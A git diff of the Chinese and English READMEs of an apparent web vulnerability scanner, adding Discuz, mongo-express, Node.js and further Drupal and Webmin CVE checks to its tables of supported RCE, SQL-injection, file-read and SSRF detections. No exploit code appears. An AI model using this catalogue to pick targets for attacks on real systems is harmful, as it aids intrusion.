diff --git a/README.md b/README.md
index 0105a5c..7ef23a1 100644
--- a/README.md
+++ b/README.md
@@ -6,97 +6,108 @@
* 如果有什么想法、建议或者遇到了BUG, 都可以issues
**目前支持扫描的web应用程序有:**
-> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Jenkins, Keycloak, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
+> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
目前支持扫描的web漏洞有: [点击展开]
```
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Target | Vul_id | Type | Method | Description |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Alibaba Druid | None | unAuth | GET | 阿里巴巴Druid未授权访问 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow身份验证绕过 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX默认密钥 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink目录遍历 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/任意文件读取 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Apache Struts2 | S2-001 | RCE | POST | Struts2远程代码执行 |
-| Apache Struts2 | S2-005 | RCE | GET | Struts2远程代码执行 |
-| Apache Struts2 | S2-007 | RCE | GET | Struts2远程代码执行 |
-| Apache Struts2 | S2-008 | RCE | GET | Struts2远程代码执行 |
-| Apache Struts2 | S2-009 | RCE | GET | Struts2远程代码执行 |
-| Apache Struts2 | S2-012 | RCE | GET | Struts2远程代码执行 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写入 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb身份认证绕过 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence任意文件包含 |
-| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence路径遍历和命令执行 |
-| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence Webwork Pre-Auth OGNL表达式命令注入 |
-| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence远程代码执行 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD XSS跨站脚本攻击 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS跨站脚本攻击 |
-| Django | CVE-2018-14574 | Redirect | GET | CommonMiddleware url重定向 |
-| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQL注入 |
-| Django | CVE-2020-9402 | SQLinject | GET | GIS SQL注入 |
-| Django | CVE-2021-35042 | SQLinject | GET | QuerySet.order_by SQL注入 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Drupal | CVE-2018-7600 | RCE | POST | Drupal Drupalgeddon 2 远程代码执行 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch命令执行 |
-| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy 沙盒绕过&&代码执行 |
-| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch 目录穿越 |
-| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch 目录穿越 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP远程代码执行 |
-| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP身份认证绕过 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 反序列化 |
-| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <=1.2.47 反序列化 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Jenkins | CVE-2018-1000861 | RCE | POST | jenkins 远程命令执行 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Keycloak | CVE-2020-10770 | SSRF | GET | 使用request_uri调用未经验证的URL |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| NodeRED | CVE-2021-3223 | FileRead | GET | Node-RED 任意文件读取 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| ShowDoc | CNVD-2020-26585 | FileUpload | POST | ShowDoc 任意文件上传 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud目录遍历 |
-| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot目录遍历 |
-| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl远程代码执行 |
-| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL远程代码执行 |
-| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework远程代码执行 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x 远程代码执行 |
-| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE |
-| ThinkPHP | CNNVD-201901-445 | RCE | POST | 核心类Request远程代码执行 |
-| ThinkPHP | None | RCE | GET | ThinkPHP2.x 远程代码执行 |
-| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids参数SQL注入 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Ueditor | None | SSRF | GET | Ueditor编辑器SSRF |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic 服务端请求伪造 |
-| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder反序列化 |
-| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async反序列化 |
-| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic权限验证绕过 |
-| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic未授权命令执行 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Webmin | CVE-2019-15107 | RCE | POST | Webmin Pre-Auth 远程代码执行 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Yonyou | CNVD-2021-30167 | RCE | GET | 用友NC BeanShell远程命令执行 |
-| Yonyou | None | FileRead | GET | 用友ERP-NC NCFindWeb目录遍历 |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Target | Vul_id | Type | Method | Description |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Alibaba Druid | None | unAuth | GET | 阿里巴巴Druid未授权访问 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow身份验证绕过 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX默认密钥 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink目录遍历 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/任意文件读取 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Apache Struts2 | S2-001 | RCE | POST | Struts2远程代码执行 |
+| Apache Struts2 | S2-005 | RCE | GET | Struts2远程代码执行 |
+| Apache Struts2 | S2-007 | RCE | GET | Struts2远程代码执行 |
+| Apache Struts2 | S2-008 | RCE | GET | Struts2远程代码执行 |
+| Apache Struts2 | S2-009 | RCE | GET | Struts2远程代码执行 |
+| Apache Struts2 | S2-012 | RCE | GET | Struts2远程代码执行 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写入 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb身份认证绕过 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence任意文件包含 |
+| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence路径遍历和命令执行 |
+| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence Webwork Pre-Auth OGNL表达式命令注入 |
+| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence远程代码执行 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD XSS跨站脚本攻击 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Discuz | wooyun-2010-080723 | RCE | GET | 全局变量防御绕过RCE |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Django | CVE-2017-12794 | XSS | GET | debug page XSS跨站脚本攻击 |
+| Django | CVE-2018-14574 | Redirect | GET | CommonMiddleware url重定向 |
+| Django | CVE-2019-14234 | SQLinject | GET | JSONfield SQL注入 |
+| Django | CVE-2020-9402 | SQLinject | GET | GIS SQL注入 |
+| Django | CVE-2021-35042 | SQLinject | GET | QuerySet.order_by SQL注入 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Drupal | CVE-2014-3704 | SQLinject | POST | Drupal < 7.32 Drupalgeddon SQL 注入 |
+| Drupal | CVE-2017-6920 | RCE | POST | Drupal Core 8 PECL YAML 反序列化代码执行 |
+| Drupal | CVE-2018-7600 | RCE | POST | Drupal Drupalgeddon 2 远程代码执行 |
+| Drupal | CVE-2018-7602 | RCE | POST | Drupal 远程代码执行 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch命令执行 |
+| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy 沙盒绕过&&代码执行 |
+| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch 目录穿越 |
+| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch 目录穿越 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP远程代码执行 |
+| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP身份认证绕过 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 反序列化 |
+| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <= 1.2.47 反序列化 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Jenkins | CVE-2018-1000861 | RCE | POST | jenkins 远程命令执行 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Keycloak | CVE-2020-10770 | SSRF | GET | 使用request_uri调用未经验证的URL |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| mongo-express | CVE-2019-10758 | RCE | POST | 未授权远程代码执行 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Nodejs | CVE-2017-14849 | FileRead | GET | Node.js目录穿越 |
+| Nodejs | CVE-2021-21315 | RCE | GET | Node.js命令执行 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| NodeRED | CVE-2021-3223 | FileRead | GET | Node-RED 任意文件读取 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| ShowDoc | CNVD-2020-26585 | FileUpload | POST | ShowDoc 任意文件上传 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud目录遍历 |
+| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot目录遍历 |
+| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl远程代码执行 |
+| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL远程代码执行 |
+| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework远程代码执行 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x 远程代码执行 |
+| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE |
+| ThinkPHP | CNNVD-201901-445 | RCE | POST | 核心类Request远程代码执行 |
+| ThinkPHP | None | RCE | GET | ThinkPHP2.x 远程代码执行 |
+| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids参数SQL注入 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Ueditor | None | SSRF | GET | Ueditor编辑器SSRF |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic 服务端请求伪造 |
+| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder反序列化 |
+| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async反序列化 |
+| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic 权限验证绕过 |
+| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic 未授权命令执行 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Webmin | CVE-2019-15107 | RCE | POST | Webmin Pre-Auth 远程代码执行 |
+| Webmin | CVE-2019-15642 | RCE | POST | Webmin 远程代码执行 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
+| Yonyou | CNVD-2021-30167 | RCE | GET | 用友NC BeanShell远程命令执行 |
+| Yonyou | None | FileRead | GET | 用友ERP-NC NCFindWeb目录遍历 |
++----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
```
@@ -201,8 +212,9 @@ Options:
支持的目标类型(-a参数, 不区分大小写):
AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,conflue
- nce,cisco,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloa
- k,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou
+ nce,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,
+ keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,w
+ eblogic,webmin,yonyou
```
## language
diff --git a/README_en-us.md b/README_en-us.md
index 0b2b407..8ba3b09 100644
--- a/README_en-us.md
+++ b/README_en-us.md
@@ -5,97 +5,108 @@
* If you have any ideas, suggestions, or bugs, you can issue
**Web applications that currently support scanning:**
-> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Jenkins, Keycloak, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
+> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
The current web vulnerabilities that support scanning: [Click on]
```
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Target | Vul_id | Type | Method | Description |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Alibaba Druid | None | unAuth | GET | Alibaba Druid unAuthorized |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | Alibaba Nacos unAuthorized |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow Authentication bypass |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX default access token |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink Directory traversal |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/FileRead |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Apache Struts2 | S2-001 | RCE | POST | Struts2 Remote code execution |
-| Apache Struts2 | S2-005 | RCE | GET | Struts2 Remote code execution |
-| Apache Struts2 | S2-007 | RCE | GET | Struts2 Remote code execution |
-| Apache Struts2 | S2-008 | RCE | GET | Struts2 Remote code execution |
-| Apache Struts2 | S2-009 | RCE | GET | Struts2 Remote code execution |
-| Apache Struts2 | S2-012 | RCE | GET | Struts2 Remote code execution |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | Put method writes to any file |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb Authentication bypass |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence any file include |
-| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence Directory traversal && RCE |
-| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence OGNL expression command injection |
-| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence Remote code execution |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Cisco | CVE-2020-3580 | XSS | POST | Cisco ASA/FTD XSS |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS |
-| Django | CVE-2018-14574 | Redirect | GET | Django CommonMiddleware URL Redirect |
-| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQLinject |
-| Django | CVE-2020-9402 | SQLinject | GET | Django GIS SQLinject |
-| Django | CVE-2021-35042 | SQLinject | GET | Django QuerySet.order_by SQLinject |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Drupal | CVE-2018-7600 | RCE | POST | Drupal Drupalgeddon 2 Remote code execution |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch Remote code execution |
-| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy Sandbox to bypass && RCE |
-| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch Directory traversal |
-| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch Directory traversal |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP Remote code execution |
-| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP Authentication bypass |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 deSerialization |
-| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <=1.2.47 deSerialization |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Jenkins | CVE-2018-1000861 | RCE | POST | jenkins Remote code execution |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Keycloak | CVE-2020-10770 | SSRF | GET | request_uri SSRF |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| NodeRED | CVE-2021-3223 | FileRead | GET | Node-RED Directory traversal |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| ShowDoc | CNVD-2020-26585 | FileUpload | POST | ShowDoc writes to any file |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud Directory traversal |
-| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot Directory traversal |
-| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl Remote code execution |
-| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL Remote code execution |
-| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework Remote code execution |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x Remote code execution |
-| ThinkPHP | CNVD-2018-24942 | RCE | GET | The forced route is not enabled Remote code execution |
-| ThinkPHP | CNNVD-201901-445 | RCE | POST | Core class Request Remote code execution |
-| ThinkPHP | None | RCE | GET | ThinkPHP2.x Remote code execution |
-| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids SQLinject |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Ueditor | None | SSRF | GET | Ueditor SSRF |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic SSRF |
-| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder deSerialization |
-| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async deSerialization |
-| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic Authentication bypass |
-| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic Unauthorized command execution |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Webmin | CVE-2019-15107 | RCE | POST | Webmin Pre-Auth Remote code execution |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
-| Yonyou | CNVD-2021-30167 | RCE | GET | Yonyou-NC BeanShell Remote code execution |
-| Yonyou | None | FileRead | GET | Yonyou-ERP-NC NCFindWeb Directory traversal |
-+----------------------+------------------+--------------+----------+------------------------------------------------------------+
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Target | Vul_id | Type | Method | Description |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Alibaba Druid | None | unAuth | GET | Alibaba Druid unAuthorized |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | Alibaba Nacos unAuthorized |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow Authentication bypass |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX default access token |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink Directory traversal |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/FileRead |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Apache Struts2 | S2-001 | RCE | POST | Struts2 Remote code execution |
+| Apache Struts2 | S2-005 | RCE | GET | Struts2 Remote code execution |
+| Apache Struts2 | S2-007 | RCE | GET | Struts2 Remote code execution |
+| Apache Struts2 | S2-008 | RCE | GET | Struts2 Remote code execution |
+| Apache Struts2 | S2-009 | RCE | GET | Struts2 Remote code execution |
+| Apache Struts2 | S2-012 | RCE | GET | Struts2 Remote code execution |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | Put method writes to any file |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb Authentication bypass |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence any file include |
+| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence Directory traversal && RCE |
+| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence OGNL expression command injection |
+| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence Remote code execution |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Cisco | CVE-2020-3580 | XSS | POST | Cisco ASA/FTD XSS |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Discuz | wooyun-2010-080723 | RCE | GET | Remote code execution |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS |
+| Django | CVE-2018-14574 | Redirect | GET | Django CommonMiddleware URL Redirect |
+| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQLinject |
+| Django | CVE-2020-9402 | SQLinject | GET | Django GIS SQLinject |
+| Django | CVE-2021-35042 | SQLinject | GET | Django QuerySet.order_by SQLinject |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Drupal | CVE-2014-3704 | SQLinject | POST | Drupal < 7.32 Drupalgeddon SQLinject |
+| Drupal | CVE-2017-6920 | RCE | POST | Drupal Core 8 PECL YAML Remote code execution |
+| Drupal | CVE-2018-7600 | RCE | POST | Drupal Drupalgeddon 2 Remote code execution |
+| Drupal | CVE-2018-7602 | RCE | POST | Drupal Remote code execution |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch Remote code execution |
+| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy Sandbox to bypass && RCE |
+| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch Directory traversal |
+| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch Directory traversal |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP Remote code execution |
+| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP Authentication bypass |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 deSerialization |
+| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <=1.2.47 deSerialization |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Jenkins | CVE-2018-1000861 | RCE | POST | jenkins Remote code execution |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Keycloak | CVE-2020-10770 | SSRF | GET | request_uri SSRF |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| mongo-express | CVE-2019-10758 | RCE | POST | Remote code execution |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Nodejs | CVE-2017-14849 | FileRead | GET | Node.js Directory traversal |
+| Nodejs | CVE-2021-21315 | RCE | GET | Node.js Remote code execution |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| NodeRED | CVE-2021-3223 | FileRead | GET | Node-RED Directory traversal |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| ShowDoc | CNVD-2020-26585 | FileUpload | POST | ShowDoc writes to any file |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud Directory traversal |
+| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot Directory traversal |
+| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl Remote code execution |
+| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL Remote code execution |
+| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework Remote code execution |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x Remote code execution |
+| ThinkPHP | CNVD-2018-24942 | RCE | GET | The forced route is not enabled Remote code execution |
+| ThinkPHP | CNNVD-201901-445 | RCE | POST | Core class Request Remote code execution |
+| ThinkPHP | None | RCE | GET | ThinkPHP2.x Remote code execution |
+| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids SQLinject |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Ueditor | None | SSRF | GET | Ueditor SSRF |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic SSRF |
